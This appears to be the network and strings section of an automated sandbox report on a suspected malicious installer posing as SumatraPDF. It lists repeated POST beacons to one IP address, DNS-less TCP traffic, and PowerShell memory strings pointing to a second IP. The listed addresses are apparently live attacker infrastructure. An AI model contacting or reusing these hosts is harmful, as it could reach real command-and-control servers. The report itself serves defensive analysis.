      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 731Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 263Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 465Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 242Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 591Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 590Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 426Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 470Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 591Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 551Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 387Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 431Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 551Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 596Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 432Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 476Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 284Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 328Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 677Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 721Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 329Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 573Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 693Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 225Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 573Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 617Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 654Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 698Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 672Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 632Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 752Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 284Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 404Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 648Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 485Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 300Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 649Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 693Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 301Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 261Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 381Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 425Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 545Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 589Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 626Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 442Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 278Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 322Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 442Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 686Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 294Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 338Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 687Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 647Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 483Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 528Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 648Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 692Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 300Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 260Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 609Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 653Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 489Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 588Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 425Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 385Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 505Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 549Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 669Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 401Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 521Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 337Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 686Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 730Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 566Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 298Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 418Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 462Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 582Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 343Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 379Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 423Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 543Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 587Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 424Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 468Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 615Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 575Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 695Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 227Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 347Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 391Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 740Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 700Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 537Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 581Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 701Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 233Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 269Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 313Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 662Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 706Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 542Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 586Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 706Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 667Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 275Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 319Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 439Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 483Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 519Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 335Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 683Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 728Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 336Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 608Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 644Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 715Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 350Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 394Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 743Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 330Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 678Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 410Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 759Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 575Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 411Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 455Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 491Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 535Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 372Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 416Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 308Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 552Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 388Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 432Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 269Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 596Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 349Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 677Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 513Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 557Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 394Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 438Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 474Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 518Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 355Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 399Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 747Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 279Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 628Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 672Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 508Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 469Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 305Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 633Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 469Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 285Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 633Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 594Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 714Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 246Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 594Expect: 100-continue
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 638Expect: 100-continue
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.104.173
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.00000221928D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.41
      Source: powershell.exe, 00000011.00000002.22279321187.000002218FAE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.00000221928D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.41/
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.00000221928D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.41/H
      Source: powershell.exe, 00000011.00000002.22320458549.00000221928D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.41/X
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.418h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.48h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.16.8h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.168h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.18h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.8h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.1028h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.108h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.18h
      Source: powershell.exe, 00000011.00000002.22320458549.0000022192878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.8h
      Source: i2wBlKtxrM.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
      Source: i2wBlKtxrM.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
      Source: powershell.exe, 0000000A.00000003.21807249713.00000290C0008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micT
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: i2wBlKtxrM.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://ocsps.ssl.com0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://ocsps.ssl.com0?
      Source: powershell.exe, 0000000F.00000002.22279126520.0000022080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.0000022191DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: i2wBlKtxrM.exeString found in binary or memory: http://sslcom.crl.certum.pl/ctnca.crl0s
      Source: i2wBlKtxrM.exeString found in binary or memory: http://sslcom.ocsp-certum.com08
      Source: i2wBlKtxrM.exeString found in binary or memory: http://sslcom.repository.certum.pl/ctnca.cer0:
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://www.daisy.org/z3986/2005/ncx/
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://www.gribuser.ru/xml/fictionbook/2.0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: http://www.idpf.org/2007/opf
      Source: i2wBlKtxrM.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: i2wBlKtxrM.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
      Source: powershell.exe, 0000000F.00000002.22279126520.0000022080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.0000022191DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://forum.sumatrapdfreader.org/https://github.com/sumatrapdfreader/sumatrapdf/blob/master/AUTHOR
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/blob/master/TRANSLATORSlast
